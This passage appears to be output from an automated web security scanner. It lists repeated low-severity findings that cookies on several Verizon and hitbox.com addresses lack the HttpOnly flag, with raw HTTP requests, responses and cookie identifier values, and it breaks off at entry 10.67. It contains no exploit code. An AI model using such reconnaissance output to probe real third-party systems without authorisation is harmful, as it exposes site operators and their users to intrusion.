Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzX^%"%X%QBer^Xez%X%QBer^Xe"%X%QBe%XB@"%X%QBer^Xer@rQe@"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:22:07 GMT; max-age=31536000
Set-Cookie: CTG=1315261327; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:22:07 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:22:08 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.35. http://ehg-verizon.hitbox.com/HGct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
DM560507CPCFV6=V1eB(#X"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
CTG=1315260821; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:41 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM550928B8DM%3BDM560507CPCF62EN3&cd=1&hv=6&n=/routing+page&con=&vcon=/vz/home/residential&tt=auto&ja=y&dt=22&zo=300&lm=1315278819000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0200u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=vzw_home,vzw_home,res_home,res_home,bus_home,bus_home,corp_vz,corp_vzw,hp_res_footer_about_us,hp_res_footer_contact_us,hp_res_footer_store_locator,hp_res_footer_careers,hp_bus_footer_vzthinkfinity,hp_res_footer_sitemap,hp_res_footer_privacy_policy,hp_res_footer_terms_conditions,hp_res_footer_site_feedback,&lv.pos=,,,,,,,,,,,,,,,,,&hid=0.22088988668371046 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: CTG=1315260819

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:41 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: CTG=1315260821; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:41 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:13:42 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.36. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.37. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/global/gHome.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.38. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/selfreg/javascript/selfreg.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:42 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.39. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fselfreg%2fsubmitEnrollmentProfileInfo%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:35:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT
Content-Length: 0

10.40. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.41. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.42. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.43. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.44. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.45. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.46. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.47. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.48. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:24 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.49. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.50. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.51. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.52. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.53. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.54. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.55. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.56. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.57. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.58. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.59. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
....................................................................................................((.==.FF.HH................................................................................
...[SNIP]...

10.60. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.61. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.62. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:17 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.63. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_video.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.64. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/s.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.65. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/tooltip_button.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:25 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.66. https://enterprisecenter.verizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.67. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.verizon.com
Path:	/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Issue detail

